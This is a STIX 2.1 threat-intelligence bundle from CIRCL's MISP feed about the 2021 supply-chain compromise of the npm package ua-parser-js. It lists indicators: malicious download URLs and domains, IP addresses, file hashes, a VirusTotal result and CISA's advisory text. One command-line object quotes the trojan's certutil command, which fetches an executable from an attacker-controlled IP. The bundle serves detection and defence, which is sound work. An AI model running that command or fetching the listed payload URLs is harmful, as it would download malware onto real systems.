misp-circl-feed/feeds/circl/stix-2.1/ad7665ec-fef2-44eb-a019-b1b25a8aec05.json

597 lines
26 KiB
JSON
Raw Normal View History

2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--ad7665ec-fef2-44eb-a019-b1b25a8aec05",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:25:55.000Z",
"modified": "2021-10-24T08:25:55.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--ad7665ec-fef2-44eb-a019-b1b25a8aec05",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:25:55.000Z",
"modified": "2021-10-24T08:25:55.000Z",
"name": "Malware Discovered in Popular NPM Package, ua-parser-js",
"published": "2021-10-24T08:26:47Z",
"object_refs": [
"observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
"url--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
"observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325",
"url--508a294c-876e-4a8a-a3bd-a3de15e10325",
"observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542",
"url--f51805cb-5fec-4ce1-b7ae-1d1206720542",
"indicator--b6541760-d7e6-432b-9715-eae2ce06ad83",
"indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972",
"indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429",
"indicator--9163b990-5b87-413c-a8e7-f616b908157f",
"x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
"x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
"indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
"indicator--e1f2c049-da88-4238-9dde-4134209c1364",
"indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
"x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
2023-12-14 14:30:15 +00:00
"relationship--ccd094c2-d4d6-41d6-b8fa-04a201564ef8",
"relationship--29dfe91e-e0f1-4b36-8965-759ce83adad2",
"relationship--f5392574-2b3c-4640-b6c7-ad5f5d9ca37a",
"relationship--b8f6ff36-8d43-4598-b179-8229c70a3671",
"relationship--960fd141-d25e-45bc-bbd1-ad65cbf350d2",
"relationship--ad6e37ab-39ef-4f78-96ba-395d3cd34b91",
"relationship--926a5932-ef3f-4746-b8ba-c8de1bbba3a9",
"relationship--a9fa8bd7-a592-49a0-aa85-b98c37c04bda",
"relationship--73e5e7f8-6e1b-4d1c-a7db-6fa158e914c9",
"relationship--42ae4bab-80ed-4eb9-81ee-02d54ae3186e",
"relationship--2dfbe964-11df-4d2b-a576-17b5c39b5814",
"relationship--2fc3e364-2a05-418b-9021-4ad398b09fa4"
2023-04-21 14:44:17 +00:00
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"type:OSINT",
"osint:lifetime=\"perpetual\"",
"osint:certainty=\"50\"",
"misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"",
"misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T07:52:52.000Z",
"modified": "2021-10-24T07:52:52.000Z",
"first_observed": "2021-10-24T07:52:52Z",
"last_observed": "2021-10-24T07:52:52Z",
"number_observed": 1,
"object_refs": [
"url--e9d82a66-46bd-4f0e-aeac-17349abddeb0"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
"value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T07:54:51.000Z",
"modified": "2021-10-24T07:54:51.000Z",
"first_observed": "2021-10-24T07:54:51Z",
"last_observed": "2021-10-24T07:54:51Z",
"number_observed": 1,
"object_refs": [
"url--508a294c-876e-4a8a-a3bd-a3de15e10325"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--508a294c-876e-4a8a-a3bd-a3de15e10325",
"value": "https://github.com/faisalman/ua-parser-js/issues/536"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T07:58:30.000Z",
"modified": "2021-10-24T07:58:30.000Z",
"first_observed": "2021-10-24T07:58:30Z",
"last_observed": "2021-10-24T07:58:30Z",
"number_observed": 1,
"object_refs": [
"url--f51805cb-5fec-4ce1-b7ae-1d1206720542"
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--f51805cb-5fec-4ce1-b7ae-1d1206720542",
"value": "http://159.148.186.228/download/jsextension.exe"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T07:59:03.000Z",
"modified": "2021-10-24T07:59:03.000Z",
"pattern": "[url:value = 'https://citationsherbe.at/sdd.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2021-10-24T07:59:03Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T07:59:45.000Z",
"modified": "2021-10-24T07:59:45.000Z",
"pattern": "[domain-name:value = 'citationsherbe.at']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2021-10-24T07:59:45Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"domain\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:00:44.000Z",
"modified": "2021-10-24T08:00:44.000Z",
"description": "sdd.dll",
"pattern": "[file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2021-10-24T08:00:44Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9163b990-5b87-413c-a8e7-f616b908157f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:01:14.000Z",
"modified": "2021-10-24T08:01:14.000Z",
"description": "jsextension.exe",
"pattern": "[file:hashes.SHA256 = '47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2021-10-24T08:01:14Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:25:55.000Z",
"modified": "2021-10-24T08:25:55.000Z",
"labels": [
"misp:name=\"report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "link",
"object_relation": "link",
"value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js",
"category": "External analysis",
"uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8"
},
{
"type": "text",
"object_relation": "summary",
"value": "Versions of a popular NPM package named ua-parser-js was found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js.",
"category": "Other",
"uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424"
},
{
"type": "text",
"object_relation": "type",
"value": "Alert",
"category": "Other",
"uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:23:57.000Z",
"modified": "2021-10-24T08:23:57.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe",
"category": "Other",
"uuid": "974258e7-2e79-413c-9be8-08698653b87b"
},
{
"type": "text",
"object_relation": "description",
"value": "The trojan try to execute in the cmd",
"category": "Other",
"uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:11:49.000Z",
"modified": "2021-10-24T08:11:49.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\"",
"cycat:scope=\"detection\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "npm show ua-parser-js time",
"category": "Other",
"uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec"
},
{
"type": "text",
"object_relation": "description",
"value": "To check the time when the package was installed",
"category": "Other",
"uuid": "542061ee-8993-44ef-8261-f27f25dc9067"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:21:22.000Z",
"modified": "2021-10-24T08:21:22.000Z",
"pattern": "[domain-name:value = 'citationsherbe.at' AND domain-name:resolves_to_refs[*].value = '95.213.165.20']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2021-10-24T08:21:22Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"domain-ip\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--e1f2c049-da88-4238-9dde-4134209c1364",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:03:02.000Z",
"modified": "2021-10-24T08:03:02.000Z",
"pattern": "[domain-name:resolves_to_refs[*].value = '159.148.186.228']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2021-10-24T08:03:02Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "network"
}
],
"labels": [
"misp:name=\"domain-ip\"",
"misp:meta-category=\"network\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:21:44.000Z",
"modified": "2021-10-24T08:21:44.000Z",
"description": "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n",
"pattern": "[file:x_misp_pattern_in_file = 'ua-parser-js']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2021-10-24T08:21:44Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:17:31.000Z",
"modified": "2021-10-24T08:17:31.000Z",
"pattern": "[file:hashes.MD5 = 'de8b54a938ac18f15cad804d79a0e19d' AND file:hashes.SHA1 = 'b6004c62e2d9dbad9cfd5f7e18647ac983788766' AND file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2021-10-24T08:17:31Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2021-10-24T08:22:57.000Z",
"modified": "2021-10-24T08:22:57.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2021-10-24T04:03:55+00:00",
"category": "Other",
"comment": "sdd.dll",
"uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235",
"category": "External analysis",
"comment": "sdd.dll",
"uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "23/50",
"category": "Artifacts dropped",
"comment": "sdd.dll",
"uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--ccd094c2-d4d6-41d6-b8fa-04a201564ef8",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:25:55.000Z",
"modified": "2021-10-24T08:25:55.000Z",
"relationship_type": "alerts",
"source_ref": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
"target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--29dfe91e-e0f1-4b36-8965-759ce83adad2",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:09:17.000Z",
"modified": "2021-10-24T08:09:17.000Z",
"relationship_type": "is-in-relation-with",
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"target_ref": "indicator--e1f2c049-da88-4238-9dde-4134209c1364"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--f5392574-2b3c-4640-b6c7-ad5f5d9ca37a",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:10:03.000Z",
"modified": "2021-10-24T08:10:03.000Z",
"relationship_type": "downloads",
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"target_ref": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--b8f6ff36-8d43-4598-b179-8229c70a3671",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:23:57.000Z",
"modified": "2021-10-24T08:23:57.000Z",
"relationship_type": "related-to",
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"target_ref": "indicator--9163b990-5b87-413c-a8e7-f616b908157f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--960fd141-d25e-45bc-bbd1-ad65cbf350d2",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:11:49.000Z",
"modified": "2021-10-24T08:11:49.000Z",
"relationship_type": "identifies",
"source_ref": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
"target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--ad6e37ab-39ef-4f78-96ba-395d3cd34b91",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:15:51.000Z",
"modified": "2021-10-24T08:15:51.000Z",
"relationship_type": "is-in-relation-with",
"source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
"target_ref": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--926a5932-ef3f-4746-b8ba-c8de1bbba3a9",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:21:22.000Z",
"modified": "2021-10-24T08:21:22.000Z",
"relationship_type": "related-to",
"source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--a9fa8bd7-a592-49a0-aa85-b98c37c04bda",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:06:58.000Z",
"modified": "2021-10-24T08:06:58.000Z",
"relationship_type": "executes",
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"target_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--73e5e7f8-6e1b-4d1c-a7db-6fa158e914c9",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:16:24.000Z",
"modified": "2021-10-24T08:16:24.000Z",
"relationship_type": "downloads",
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--42ae4bab-80ed-4eb9-81ee-02d54ae3186e",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:21:44.000Z",
"modified": "2021-10-24T08:21:44.000Z",
"relationship_type": "describes",
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"target_ref": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--2dfbe964-11df-4d2b-a576-17b5c39b5814",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:17:32.000Z",
"modified": "2021-10-24T08:17:32.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
"target_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--2fc3e364-2a05-418b-9021-4ad398b09fa4",
2023-04-21 14:44:17 +00:00
"created": "2021-10-24T08:22:57.000Z",
"modified": "2021-10-24T08:22:57.000Z",
"relationship_type": "related-to",
"source_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}